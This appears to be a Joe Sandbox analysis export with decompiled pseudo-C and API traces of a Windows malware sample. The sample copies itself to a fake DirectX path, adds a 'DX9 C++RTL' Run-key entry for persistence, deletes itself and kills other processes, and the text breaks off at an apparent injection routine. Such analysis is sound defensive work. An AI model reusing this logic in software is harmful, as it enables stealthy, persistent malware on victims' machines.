    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}
































    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}









    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 85%
    			_entry_() {
    				char _v24;
    				char _v28;
    				void* _t17;
    				void* _t21;
    				void* _t32;
    				void* _t33;
    				void* _t38;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t42;
    
    				_v28 = 0;
    				_v24 = 0;
    				E00405ADC(0x418be0);
    				_push(0x418d7b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				_push(_t40);
    				_push(0x418d4a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t41;
    				_t42 = E00402944(_t32, _t39) - 2;
    				if(_t42 > 0) {
    					E004029A4(2,  &_v24);
    					E00404294(_v24, 0x418d94);
    					if(_t42 == 0) {
    						E004029A4(3,  &_v28);
    						DeleteFileA(E00404348(_v28)); // executed
    					}
    				}
    				E00418750(_t32, _t38, _t39); // executed
    				E00418A14(_t32, _t38, _t39);
    				E00418540(_t33);
    				E00418B90(_t33);
    				while(1) {
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    					if(_t17 == 0) {
    						continue;
    					}
    					L5:
    					E00418590(_t43);
    					while(E00418570() != 0) {
    						E004189E8();
    						Sleep(0x32);
    					}
    					_t21 =  *0x454a64; // 0x0
    					ResumeThread(_t21);
    					do {
    						goto L4;
    					} while (_t17 == 0);
    					goto L5;
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    				}
    			}














    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D14() {
    				intOrPtr* _t13;
    				struct HINSTANCE__* _t27;
    				void* _t36;
    				intOrPtr _t39;
    				void* _t52;
    
    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L5:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t36);
    						 *0x419004 = 0;
    					}
    					L7:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t17 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t17);
    							_t39 =  *((intOrPtr*)(0x454640));
    							_t7 = _t39 + 0x10; // 0x400000
    							_t27 =  *_t7;
    							_t8 = _t39 + 4; // 0x400000
    							if(_t27 !=  *_t8 && _t27 != 0) {
    								FreeLibrary(_t27);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t52 = _t52 + 0xc;
    					0x419000 = 0x419000;
    					goto L7;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L5;
    				}
    			}









    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
    				char _v1032;
    				int _t13;
    				void* _t22;
    
    				_t21 = __edx;
    				if(__eax != 0) {
    					if( *(__eax + 4) >= 0x10000) {
    						return E00404080(__edx,  *(__eax + 4));
    					}
    					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
    					return E00403F78(_t21, _t13, _t22);
    				}
    				return __eax;
    			}







    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}









    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				CONTEXT* _v16;
    				void* _v20;
    				void _v24;
    				void _v28;
    				long _v32;
    				struct _PROCESS_INFORMATION _v48;
    				struct _STARTUPINFOA _v116;
